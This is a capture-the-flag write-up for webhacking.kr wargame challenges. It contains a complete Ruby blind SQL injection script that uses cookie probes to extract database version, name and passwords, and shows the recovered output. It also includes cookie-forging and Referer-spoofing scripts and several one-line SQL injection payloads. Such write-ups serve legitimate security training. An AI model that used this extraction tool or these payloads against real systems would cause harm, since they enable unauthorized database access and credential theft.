Reverse..

WebHacking.kr

00. Register

  • HTML Comment tag
  • Base64 Decode
  • Source code(PHP) Reading
  • Cookie Managing

02. Blind SQL Injection

  • Blind SQL Injection
bsql.rb
#!/usr/bin/env ruby
#encoding: utf-8
#by [email protected]
 
require 'uri'
require 'net/http'
require 'openssl'
 
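# Blind SQL injection driver for webhacking.kr challenge 2 (web-02).
#
# The page evaluates the `time` cookie inside a SQL expression and renders the
# date matched by MATCH exactly when that expression is true, so a boolean
# probe of the form `time=<n> AND ((<subquery>)<=<bound>)` leaks one bit per
# request. Each value (a LENGTH() or a single ORD()) is recovered with a binary
# search over the bound, i.e. about eight requests per byte.
class WebHackLv2
  # Marker that appears in the response body only for a true probe.
  MATCH = /2070-01-01 09:00:01/
  URL = 'http://webhacking.kr/challenge/web/web-02/index.php'
  # Base value of the `time` cookie. Only its truthiness matters to the probe,
  # so any non-zero number works; one constant keeps every probe identical
  # (the original used two different values in the length and string paths).
  TIME = 1_427_760_582
  # Largest value probed for: LENGTH() of the short strings here and ORD() of a
  # single byte both fit in 0..255. Anything larger makes the search fail.
  MAX_VALUE = 0xFF
  USER_AGENT = 'lv2'
  # Hard cap on redirect chasing in #fetch.
  MAX_REDIRECTS = 10

  # @param session [String] PHPSESSID of a logged-in webhacking.kr session
  # @param verbose [Boolean] print progress for every recovered value when true
  # @param verify_tls [Boolean] verify the server certificate for https targets
  #   (URL is plain http, so this only matters if URL or a redirect is https)
  def initialize(session, verbose = false, verify_tls: true)
    @session = session
    @verbose = verbose
    @verify_tls = verify_tls
  end

  # Recover the value of `field` (a column name or SQL expression), optionally
  # scoped by `table` and a `filter` (WHERE clause body), as a string.
  # @return [String] the extracted value
  # @raise [RuntimeError] when no probe ever matches (see #get_length)
  def query(field, table = nil, filter = nil)
    log sep
    log "Request => field: '#{field}', table: '#{table}', filter: '#{filter}'"
    log sep

    log '[Length]'
    length = get_length(field, table, filter)

    log '[String]'
    get_string(length, field, table, filter)
  end

  # Recover LENGTH(field) by binary search.
  # @return [Integer] the length
  # @raise [RuntimeError] if no probe matched; in practice the session expired,
  #   the table/filter is wrong, or the value exceeds MAX_VALUE. The original
  #   returned nil here and crashed later in #get_string with a cryptic error.
  def get_length(field, table = nil, filter = nil)
    sql = build_query("LENGTH(#{field})", table, filter)
    length = search_value(sql)
    raise "no probe matched for #{sql.strip}: check the session, table and filter" if length.nil?

    log "  *length: #{length}"
    length
  end

  # Recover `length` characters of `field`, one ORD(MID(...)) probe per position.
  # Assumes single-byte character codes; a code above MAX_VALUE is a failure.
  # @return [String] the recovered value ('' when length is 0)
  # @raise [RuntimeError] if a position yields no matching probe
  def get_string(length, field, table = nil, filter = nil)
    str = ''

    1.upto(length) do |pos|
      sql = build_query("ORD(MID(#{field}, #{pos}, 1))", table, filter)
      code = search_value(sql)
      raise "no probe matched for #{sql.strip}: check the session, table and filter" if code.nil?

      str << code.chr
      log "  *string: #{str}"
    end
    str
  end

  # Assemble the scalar subquery injected into the probe. The arguments are the
  # operator's own SQL fragments, not untrusted input, so they are interpolated
  # verbatim and no quoting is applied.
  # @return [String] " SELECT expr[ FROM table][ WHERE filter]"
  def build_query(expr, table = nil, filter = nil)
    sql = " SELECT #{expr}"
    sql << " FROM #{table}" if table
    sql << " WHERE #{filter}" if filter
    sql
  end

  # Binary-search the integer value of `sql`: the smallest bound in
  # 0..MAX_VALUE for which `(sql) <= bound` holds, which is the value itself.
  # @return [Integer, nil] nil when no bound matches
  def search_value(sql)
    (0..MAX_VALUE).bsearch { |bound| true?(request(cookie_header(sql, bound))) }
  end

  # Cookie header carrying the boolean probe and the session id.
  def cookie_header(sql, bound)
    { 'Cookie' => "time=#{TIME} AND ((#{sql})<=#{bound}) --; PHPSESSID=#{@session}" }
  end

  # True when the response body carries the success marker.
  def true?(body)
    !!(MATCH =~ body)
  end

  # Fetch URL with the given headers and return the body.
  def request(header)
    fetch(URL, header).body
  end

  # GET `uri` with `header`, following at most `limit` redirects.
  # @return [Net::HTTPSuccess] the final response
  # @raise [ArgumentError] when the redirect budget is exhausted
  # @raise [Net::HTTPExceptions] (via Net::HTTPResponse#value) on any other
  #   non-success status
  def fetch(uri, header = {}, limit = MAX_REDIRECTS)
    raise ArgumentError, 'too many HTTP redirects' if limit <= 0

    header = header.merge('User-Agent' => USER_AGENT)
    uri = URI(uri)

    http = Net::HTTP.new(uri.host, uri.port)
    if uri.scheme == 'https'
      http.use_ssl = true
      # Certificate verification stays on unless the caller opted out; the
      # original set VERIFY_NONE unconditionally and accepted any certificate.
      http.verify_mode = @verify_tls ? OpenSSL::SSL::VERIFY_PEER : OpenSSL::SSL::VERIFY_NONE
    end
    http.read_timeout = 500

    response = http.start { http.get(uri.request_uri, header) }

    case response
    when Net::HTTPSuccess then response
    when Net::HTTPRedirection
      location = response['location']
      warn "redirected to #{location}"
      # The original passed `limit - 1` in the header slot and so crashed on
      # the first redirect; forward the headers (session cookie included) and
      # resolve relative Location values against the current URI.
      fetch(URI.join(uri, location), header, limit - 1)
    else
      response.value
    end
  end

  # Separator line used by the verbose output.
  def sep
    '-' * 64
  end

  private

  # Print a progress line only in verbose mode.
  def log(line)
    puts line if @verbose
  end
end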
 
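# Session cookie of a logged-in webhacking.kr account. Set the PHPSESSID
# environment variable to use a fresh session instead of editing this file;
# the literal below is the one the write-up was run with and is long expired.
PHPSESSID = ENV.fetch('PHPSESSID', 'kumviv7k8g0qj77rmrodq7vbd7')

# Verbose so the progress of every recovered value is printed.
lv2 = WebHackLv2.new(PHPSESSID, true)

# Fingerprint the backend first ...
%w[version() database() @@port].each { |expr| puts lv2.query(expr) }
# ... then pull the two passwords the challenge asks for.
puts lv2.query('password', 'admin')
puts lv2.query('password', 'FreeB0aRd')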
 
#
# result:
# 
# $ bsql.rb
# ----------------------------------------------------------------
# Request => field: 'version()', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 14
# [String]
#   *string: 5
#   *string: 5.
#   *string: 5.5
#   *string: 5.5.
#   *string: 5.5.3
#   *string: 5.5.30
#   *string: 5.5.30-
#   *string: 5.5.30-M
#   *string: 5.5.30-Ma
#   *string: 5.5.30-Mar
#   *string: 5.5.30-Mari
#   *string: 5.5.30-Maria
#   *string: 5.5.30-MariaD
#   *string: 5.5.30-MariaDB
# 5.5.30-MariaDB
# ----------------------------------------------------------------
# Request => field: 'database()', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 9
# [String]
#   *string: o
#   *string: ol
#   *string: old
#   *string: oldz
#   *string: oldzo
#   *string: oldzom
#   *string: oldzomb
#   *string: oldzombi
#   *string: oldzombie
# oldzombie
# ----------------------------------------------------------------
# Request => field: '@@port', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 4
# [String]
#   *string: 3
#   *string: 33
#   *string: 330
#   *string: 3306
# 3306
# ----------------------------------------------------------------
# Request => field: 'password', table: 'admin', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 10
# [String]
#   *string: 0
#   *string: 0n
#   *string: 0nl
#   *string: 0nly
#   *string: 0nly_
#   *string: 0nly_a
#   *string: 0nly_ad
#   *string: 0nly_adm
#   *string: 0nly_admi
#   *string: 0nly_admin
# 0nly_admin
# ----------------------------------------------------------------
# Request => field: 'password', table: 'FreeB0aRd', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 9
# [String]
#   *string: 7
#   *string: 75
#   *string: 759
#   *string: 7598
#   *string: 75985
#   *string: 759852
#   *string: 7598522
#   *string: 7598522a
#   *string: 7598522ae
# 7598522ae
# 

03.

04. Digest::SHA1 & Base64

  • Digest::SHA1 hash
  • Base64 encode | decode
sha1.rb
require 'digest'
require 'base64'
 
# Challenge 4: the expected cookie is base64(sha1(sha1('test'))), where each
# SHA-1 is taken as a lowercase hex string, not raw digest bytes.
inner = Digest::SHA1.hexdigest('test')
outer = Digest::SHA1.hexdigest(inner)
puts Base64.strict_encode64(outer)
# => "YzQwMzNiZmY5NGI1NjdhMTkwZTMzZmFhNTUxZjQxMWNhZWY0NDRmMg=="

06. Base64 & Set-Cookie

  • Base64 encode | decode
  • Set-Cookie
base64_set-cookie.rb
#!ruby
#encoding: utf-8
#06. Base64 & set Cookie
 
require 'base64'
require 'open-uri'
 
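# Produce the cookie value challenge 6 expects: the input is base64-encoded
# twenty times, the digits 1-8 are swapped for the symbols the challenge's
# decoder swaps back, and the result is percent-escaped for the Cookie header
# (of the symbols used, only '^' is outside the RFC 2396 safe set, so in
# practice only '%5E' appears).
#
# @param str [String] plain value, e.g. 'admin'
# @return [String] escaped cookie value ('' for '')
def encode(str)
  encoded = str
  20.times { encoded = Base64.strict_encode64(encoded) }

  # A single tr pass is equivalent to the original chain of gsub! calls:
  # none of the replacement symbols is itself a digit, so no substitution
  # feeds into a later one.
  encoded = encoded.tr('12345678', '!@$^&*()')

  # URI.encode was removed in Ruby 3.0; RFC2396_Parser#escape is the method it
  # delegated to, so the output is unchanged on older interpreters.
  URI::RFC2396_Parser.new.escape(encoded)
end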
 
# Request the challenge 6 page with the forged `user`/`password` cookies (both
# the encoded form of 'admin') plus the session cookie, and return the body.
#
# @param session_id [String] PHPSESSID cookie value
# @return [String] response body
def fetch(session_id)
  page = URI('http://webhacking.kr/challenge/web/web-06/')
  credential = encode('admin')
  headers = { 'Cookie' => "user=#{credential}; password=#{credential}; PHPSESSID=#{session_id}" }

  page.open(headers, &:read)
end
 
 
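# Session cookie of a logged-in account; set the PHPSESSID environment
# variable to use a fresh one (the literal is the write-up's expired session).
puts fetch(ENV.fetch('PHPSESSID', 'ostf6f8t6ffuht25vkf3cb7n06'))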
 
# 
# <html>
# <head>
# <title>Challenge 6</title>
# <style type="text/css">
# body { background:black; color:white; font-size:10pt; }
# </style>
# </head>
# <body>
# 
# <font style=background:silver;color:black>&nbsp;&nbsp;HINT : base64&nbsp;&nbsp;</font><hr><a href=index.phps style=color:yellow;>index.phps</a><br><br>ID : admin<br>PW : admin<hr><script>alert('Congratulation!');</script><center><h1><br><br><hr><font color=gray>You have cleared the 6 problems.</font><br><br><font color=green><b>Score + 100</b></font><br><hr></h1></center>
# </body>
# </html>

07. SQL Injection

val=09)%09UNION%09SELECT%09(09-07

08. SQL Injection

  • User-Agent
  • HTTP_USER_AGENT

admin','admin','admin') #

09.

10. Javascript & Referer Header

  • Javascript
  • Referer Header
js_ref.rb
#!ruby
#encoding: utf-8
#10. Javascript & Referer Header
 
require 'open-uri'
 
# Request the challenge 10 page with `go=800` while presenting the page's own
# URL (without the query string) as Referer, and return the body.
#
# @param session_id [String] PHPSESSID cookie value
# @return [String] response body
def fetch(session_id)
  page = URI('http://webhacking.kr/challenge/codeing/code1.html')
  headers = {
    # Captured before the query is attached, so the Referer has no "?go=800".
    'Referer' => page.to_s,
    'Cookie' => "PHPSESSID=#{session_id}"
  }

  page.query = 'go=800'
  page.open(headers, &:read)
end
 
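# Session cookie of a logged-in account; set the PHPSESSID environment
# variable to use a fresh one (the literal is the write-up's expired session).
puts fetch(ENV.fetch('PHPSESSID', 'ostf6f8t6ffuht25vkf3cb7n06'))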

11. Regex

  • Regex

val=2fffff_14.50.138.202_%09p%09a%09s%09s

14. JavaScript

  • View Source
  • JavaScript Debugger
  • Breakpoint

15. JavaScript

  • View Source
  • Disable JavaScript

16. JavaScript

  • ASCII

irb(main):010:0> 124.chr # => "|"

17. JavaScript

  • View Source
  • JavaScript Debugger
  • Breakpoint

18. SQL Injection

  • SQL Injection
  • OR and AND

no=12%0AOR%0A12%0AAND%0Ano=2
